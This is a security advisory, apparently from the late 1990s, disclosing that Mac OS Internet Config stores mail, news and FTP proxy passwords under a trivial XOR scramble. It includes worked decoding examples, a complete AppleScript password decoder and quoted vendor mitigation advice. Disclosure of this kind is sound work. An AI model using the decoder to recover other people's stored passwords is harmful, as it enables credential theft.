StaticUsers.net – Internet Config Advisory
Password weakness in Internet Config in MacOS
What is Internet Config?
From Internet Config FAQ: “The Internet Configuration System was designed to make your life easier by reducing the number of times which you need to enter your Internet preferences into the various preferences dialogs of all your Internet applications.
For example, currently you need to enter your Email address into many common
Macintosh Internet applications, for example Eudora, NewsWatcher and Anarchie.
The goal of the system was to get each of these applications to get this information
from one common place and to give you a tool to edit these common preferences.”
For example, when you install Power Mail 2.3.1 you can find Internet Config 2.0 in the Power Mail folder. You can use it to set your Internet configuration and then select the “Use Internet Config” option when you set up your e-mail account. Among other things, Internet Config lets you set an Email Password, a News Password and an FTP Proxy Password. All of these passwords are encoded the same way.
Where can you find a password?
In the Internet Preferences file in the Preferences folder. Open this file with a resource editor (ResEdit, for instance) and open the ICRP resource. There you can find the encrypted passwords: MailPassword, NewsAuthPassword and FTPProxyPassword. You can also find them with any hex editor, but the offset depends on the configuration.
Some examples
09 38 3E 3F 31 2E 29 3D 34 30 = nightrain
08 14 3B 39 3A 31 1F 33 3A = BlackDog
09 3B 38 37 37 36 32 3B 35 2A = moonlight
06 19 02 0C 15 1B 0C = OUTLAW
05 37 27 28 35 3F = apple
The first byte is the length of the password, so we don’t need it.
AA BB CC DD EE FF GG HH II JJ = aa bb cc dd ee ff gg hh ii jj
where:
AA BB CC DD EE FF GG HH II JJ – encrypted password (hex)
aa bb cc dd ee ff gg hh ii jj – decrypted password in ASCII codes (hex)
aa=AA XOR 56H
bb=BB XOR 57H
cc=CC XOR 58H
dd=DD XOR 59H
ee=EE XOR 5AH
ff=FF XOR 5BH
gg=GG XOR 5CH
hh=HH XOR 5DH
ii=II XOR 5EH
jj=JJ XOR 5FH
and so on…
An example:
38H XOR 56H = 6EH = n
3EH XOR 57H = 69H = i
3FH XOR 58H = 67H = g
31H XOR 59H = 68H = h
2EH XOR 5AH = 74H = t
29H XOR 5BH = 72H = r
3DH XOR 5CH = 61H = a
34H XOR 5DH = 69H = i
30H XOR 5EH = 6EH = n
Solution
Don’t use it, or at least don’t enter any password. I wonder why Netscape supports it, for example.
Tested on:
Internet Config v.1.3, v.1.4, v.2.0 and v.2.0.2
Netscape Messenger 4.5, PowerMail 2.3.1, E(asy)-mail 2.0,
From the Internet Config FAQ:
“The following programs supported Internet Config before 8 Nov 1995. NewsWatcher 2.0b21 and higher, Register 1.1 and higher, NotifyMail 2.5 and higher, BlitzMail 2.0.2 and higher, MacGzip 0.2.2 and higher, FTPd 2.4.0 and higher, ICeTEe 1.1 and higher, Internet Config Access, Mpack 1.5 and higher, BBEdit 3.1.1 and higher, NewsHopper 1.1 and higher, Anarchie 1.5.0 and higher, NCSA Telnet 2.6.1d7 and higher, Black Night 0.1.4 and higher, DropURL 1.1 and higher, CyberFinder, Symantec Project Manager 8.0.3 and higher, Personal Log 2.0 and higher, most programs based on the WASTE text editing engine, Claris Emailer, Fetch 3.0b5 and higher, PowerMail, ICScriptor, Kapito, Style 1.3.2 and higher, Internet Toolkit, NetSnagger.”
A simple AppleScript to demonstrate the weakness of the password encoding.
Usage: leave out the first number (the length byte) and don’t put spaces between the bytes.
For example: 383E3F312E293D3430, but not 09383E3F312E293D3430 or 38 3E 3F 31 2E 29 3D 34 30.
(* IC Pass 2.1 by adix 21.07.99; Apple Script English *)
set hex1 to text returned of (display dialog "Enter encrypted password:" default answer "" buttons {" Ok "} default button " Ok ")
-- Key bytes 56H to 5FH written out in binary, 8 bits per password character
set Alicia to "01010110010101110101100001011001010110100101101101011100010111010101111001011111"
set pass to ""
set i to 1
set skok to 0 -- bit offset into Alicia for the current character
set ile to count items in hex1 -- number of hex digits entered
if ile = 1 or ile = 0 then
	set pass to ""
else
	repeat until (i > (ile - 1))
		set kodascii to 0
		set zn to items (i) thru (i + 1) in hex1 -- two hex digits = one byte
		set lbin to hex2bin(zn) as string
		repeat with a from 1 to 8
			-- XOR the encrypted byte with the key byte, bit by bit
			set bit2 to item (a + skok) of Alicia
			set bit1 to item a of lbin
			if (bit1 = bit2) then
				set bitk to "0"
			else
				set bitk to "1"
			end if
			set kodascii to (kodascii + bitk * (2 ^ (8 - a)))
		end repeat
		set pass to (pass & (ASCII character kodascii))
		set skok to skok + 8
		set i to i + 2
	end repeat
end if
display dialog "Password: " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok "

-- Convert a list of hex digits to a string of binary digits
on hex2bin(zn)
	set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"}
	set t2hex to "0123456789ABCDEF"
	set bin to "" as string
	repeat with j in zn
		set t1 to j as string
		repeat with i from 1 to (count items in t2hex)
			if ((item i in t2hex) = t1) then
				set temp to (item i in temphex)
				exit repeat
			end if
		end repeat
		set bin to (bin & temp) as string
	end repeat
	return (bin)
end hex2bin
Solutions
From the Internet Config FAQ:
IC does provide the ability for applications to share preferences. Any information you enter into Internet Config can be accessed by any other software you execute on your machine.
This includes preferences like the email password. You should be aware that such passwords are available to any software on your computer. IC stores passwords in a non-secure fashion.
While each password is scrambled to prevent idle viewing with ResEdit, the scrambling algorithm is publicly documented in the IC Programming Kit. Anyone with a trivial programming background can access these passwords.
Note: This situation is no different from the passwords you enter into other applications. When you ask a program (such as Users & Groups) to store a password, it must be stored in some file somewhere on your hard disk. The only difference is that IC provides a public API for getting at these passwords. The important thing to keep in mind is that you should not install software that you do not trust on your machine.
Note: If you ignore this advice (and install software you do not trust on to your computer), password secrecy is the least of your problems. Specifically, the Mac OS does not prevent a program from erasing the entire contents of your hard disk.
If you want to know which applications are accessing which IC preferences, you can install:
ICAccess Logger (ftp://ftp.stairways.com/stairways/hacks/).